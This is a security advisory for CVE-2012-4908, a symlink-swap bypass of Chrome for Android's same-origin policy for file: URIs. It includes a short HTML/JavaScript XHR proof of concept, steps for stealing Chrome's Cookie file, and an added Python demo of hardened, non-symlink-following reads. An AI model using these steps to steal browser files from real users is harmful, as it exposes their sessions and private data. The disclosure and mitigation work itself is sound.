Chrome for Android - Bypassing SOP for Local Files By Symlinks
2013-01-10T00:00:00
ID SECURITYVULNS:DOC:28941 Type securityvulns Reporter Securityvulns Modified 2013-01-10T00:00:00
Description
CVE Number: CVE-2012-4908
Title: Chrome for Android - Bypassing SOP for Local Files By Symlinks
Affected Software: Confirmed on Chrome for Android v18.0.1025123
Credit: Takeshi Terada
Issue Status: v18.0.1025308 has been released, which fixes this vulnerability
Overview:
 Chrome for Android's Same-Origin Policy for local files (file: URIs) can be
 bypassed by using symbolic links. This allows malicious Android apps to
 steal Chrome's private files.
Details:
 Chrome for Android forbids a local file from reading another local file,
 except for the originating file itself:

 http://code.google.com/p/chromium/issues/detail?id=37586

 However, it is possible to circumvent the restriction with a symbolic-link
 trick.

 This issue enables malicious Android apps to steal Chrome's private
 files, such as Chrome's Cookie file, bookmark file, and so on.

 As an example, the steps to steal Chrome's Cookie file are described below:

 1. An attacker's app creates a malicious HTML file and makes Chrome load
    its URL as a file: URI. The malicious HTML contains JavaScript code
    which, a few seconds later, tries to read the content of the same URL
    as the malicious HTML itself via XMLHttpRequest.

 <body>
 <u>Wait a few seconds.</u>
 <script>
 function doitjs() {
   // Read the document's own file: URL; same origin, so this is permitted.
   var xhr = new XMLHttpRequest;
   xhr.onload = function() {
     alert(xhr.responseText);
   };
   xhr.open('GET', document.URL);
   xhr.send(null);
 }
 // Delay gives the app time to swap the file underneath the browser.
 setTimeout(doitjs, 8000);
 </script>
 </body>

 2. Before the XHR fires, the attacker's app replaces the malicious
    HTML file with a symlink pointing to Chrome's Cookie file.

 3. When the XHR fires, Chrome follows the symlink and returns the
    content of Chrome's Cookie file to the malicious HTML.

 The attacker's app can obtain the content of Chrome's other private
 files in the same manner.
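The root cause is a time-of-check/time-of-use gap: the browser decided the page may read "itself" when it loaded the file, but re-resolved the path at XHR time and followed whatever was there. The following is an added illustration, not code from the advisory or from Chromium, of how a file: loader can close that gap. It replays the swap on constructed files in a temporary directory (a stand-in file named Cookies holds a made-up secret), and contrasts a naive re-open with a hardened read that pins the origin at load time (canonical path plus device/inode), opens with O_NOFOLLOW so a symlink in the final component is refused, and re-checks the opened file's identity with fstat. Function names such as pin_origin and hardened_read are hypothetical.

```python
import errno
import os
import tempfile


class SameOriginViolation(Exception):
    """Raised when a file: read would leave the origin granted at load time."""


def _open_nofollow(path):
    # O_NOFOLLOW makes open() fail with ELOOP when the *final* path component
    # is a symlink, so a swapped-in link is refused instead of silently followed.
    try:
        return os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError as exc:
        if exc.errno == errno.ELOOP:
            raise SameOriginViolation("final path component is a symlink: %s" % path)
        raise


def pin_origin(path):
    """Record the file's identity at load time: canonical path plus (dev, inode)."""
    fd = _open_nofollow(path)
    try:
        st = os.fstat(fd)
    finally:
        os.close(fd)
    return (os.path.realpath(path), st.st_dev, st.st_ino)


def naive_read(path):
    """Vulnerable pattern: re-resolves the path at read time and follows whatever is there now."""
    with open(path, "rb") as f:
        return f.read()


def hardened_read(path, pinned):
    """Read only if the path still denotes the exact file pinned at load time."""
    real, dev, ino = pinned
    # 1. The canonical path must still match the origin that was granted.
    if os.path.realpath(path) != real:
        raise SameOriginViolation("path now resolves to %s" % os.path.realpath(path))
    # 2. Open without following a symlink in the final component.
    fd = _open_nofollow(path)
    with os.fdopen(fd, "rb") as f:
        # 3. Compare the identity of the object actually opened with the pinned
        #    one; this closes the check-then-open window a realpath() check leaves.
        st = os.fstat(f.fileno())
        if (st.st_dev, st.st_ino) != (dev, ino):
            raise SameOriginViolation("file identity changed since load")
        return f.read()


def demo():
    """Replay the advisory's three steps on constructed files; report what each reader saw."""
    with tempfile.TemporaryDirectory() as d:
        html = os.path.join(d, "attacker.html")
        cookies = os.path.join(d, "Cookies")  # constructed stand-in for a private browser file
        with open(cookies, "wb") as f:
            f.write(b"session=constructed-secret")
        with open(html, "wb") as f:
            f.write(b"<body>Wait a few seconds.</body>")

        pinned = pin_origin(html)             # step 1: page loads, its origin is pinned
        before = hardened_read(html, pinned)  # the page may still read itself

        os.remove(html)                       # step 2: the file is swapped for a symlink
        os.symlink(cookies, html)

        leaked = naive_read(html)             # step 3, unpatched: the symlink is followed
        try:
            hardened_read(html, pinned)
            blocked = False
        except SameOriginViolation:
            blocked = True
        try:                                  # O_NOFOLLOW alone also refuses the link
            os.close(_open_nofollow(html))
            nofollow_refused = False
        except SameOriginViolation:
            nofollow_refused = True
        return {"before": before, "leaked": leaked,
                "blocked": blocked, "nofollow_refused": nofollow_refused}


if __name__ == "__main__":
    print(demo())
```

The realpath comparison catches the swap shown in the advisory, but on its own it is still racy (the link could appear between the check and the open); the O_NOFOLLOW open plus the fstat identity check are what make the read atomic with respect to the decision. Directory-level symlinks elsewhere in the path are not covered by O_NOFOLLOW, which is why the inode comparison is kept as the final arbiter.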
Proof of Concept:
 The HTML/JavaScript is shown above. At present I do not have plans to
 disclose a PoC of the malicious Android app.
Timeline:
 2012/08/19 Reported to Google security team
 2012/08/25 Re-reported to Chrome security team
 2012/09/12 Vendor announced v18.0.1025308
 2013/01/07 Disclosure of this advisory
Recommendation:
 Upgrade to the latest version.
Reference:
 http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
 https://code.google.com/p/chromium/issues/detail?id=144866